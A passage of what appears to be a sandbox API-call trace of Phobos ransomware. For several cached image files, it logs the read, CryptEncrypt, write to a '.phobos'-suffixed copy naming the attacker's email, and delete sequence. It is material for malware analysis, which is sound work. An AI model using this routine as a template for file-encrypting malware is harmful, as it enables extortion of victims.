pbBuffer=0x2f4fd30) returned 1 [0173.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo8dq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0173.803] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1882) returned 1 [0173.803] CloseHandle (hObject=0x158) returned 1 [0173.803] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo8dq[1].jpg")) returned 0x2020 [0173.803] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo8dq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo8dq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0173.803] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.804] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo8dq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0173.804] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0173.804] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.804] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x75a, lpOverlapped=0x0) returned 1 [0173.915] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x760, dwBufLen=0x760 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x760) returned 1 [0173.915] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x760, lpOverlapped=0x0) returned 1 [0173.915] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0173.915] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.915] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0173.915] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.915] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0173.916] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0173.916] CloseHandle (hObject=0x158) returned 1 [0173.916] CloseHandle (hObject=0x130) returned 1 [0173.916] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo8dq[1].jpg")) returned 1 [0173.917] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0173.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbboe7c[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0173.917] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=11657) returned 1 [0173.917] CloseHandle (hObject=0x130) returned 1 [0173.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbboe7c[1].jpg")) returned 0x2020 [0173.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbboe7c[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbboe7c[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0173.918] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.918] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbboe7c[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0173.918] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0173.918] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.918] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2d89, lpOverlapped=0x0) returned 1 [0173.972] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d90, dwBufLen=0x2d90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d90) returned 1 [0173.972] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2d90, lpOverlapped=0x0) returned 1 [0173.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0173.973] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.973] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0173.973] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.973] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0173.973] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0173.973] CloseHandle (hObject=0x130) returned 1 [0173.973] CloseHandle (hObject=0x158) returned 1 [0173.973] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbboe7c[1].jpg")) returned 1 [0173.974] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0173.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpthn[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0173.975] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7734) returned 1 [0173.975] CloseHandle (hObject=0x158) returned 1 [0173.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpthn[1].jpg")) returned 0x2020 [0173.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpthn[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpthn[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0173.975] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.975] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpthn[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0173.976] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0173.976] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.976] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1e36, lpOverlapped=0x0) returned 1 [0174.066] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e40, dwBufLen=0x1e40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e40) returned 1 [0174.067] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1e40, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1e40, lpOverlapped=0x0) returned 1 [0174.067] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0174.067] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.067] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0174.068] CryptDestroyKey (hKey=0xa32d28) returned 1 [0174.068] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0174.068] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.068] CloseHandle (hObject=0x158) returned 1 [0174.068] CloseHandle (hObject=0x130) returned 1 [0174.068] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpthn[1].jpg")) returned 1 [0174.069] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0174.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpufj[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.069] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7911) returned 1 [0174.070] CloseHandle (hObject=0x130) returned 1 [0174.070] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpufj[1].jpg")) returned 0x2020 [0174.070] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpufj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpufj[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.070] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.070] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpufj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.070] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0174.070] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.070] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1ee7, lpOverlapped=0x0) returned 1 [0174.139] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1ef0, dwBufLen=0x1ef0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1ef0) returned 1 [0174.139] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1ef0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1ef0, lpOverlapped=0x0) returned 1 [0174.140] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0174.140] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.140] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0174.140] CryptDestroyKey (hKey=0xa32d28) returned 1 [0174.140] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0174.140] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.140] CloseHandle (hObject=0x130) returned 1 [0174.140] CloseHandle (hObject=0x158) returned 1 [0174.140] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbpufj[1].jpg")) returned 1 [0174.141] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0174.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbqxzx[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.142] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2340) returned 1 [0174.142] CloseHandle (hObject=0x158) returned 1 [0174.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbqxzx[1].jpg")) returned 0x2020 [0174.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbqxzx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbqxzx[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbqxzx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.144] CryptImportKey (in: 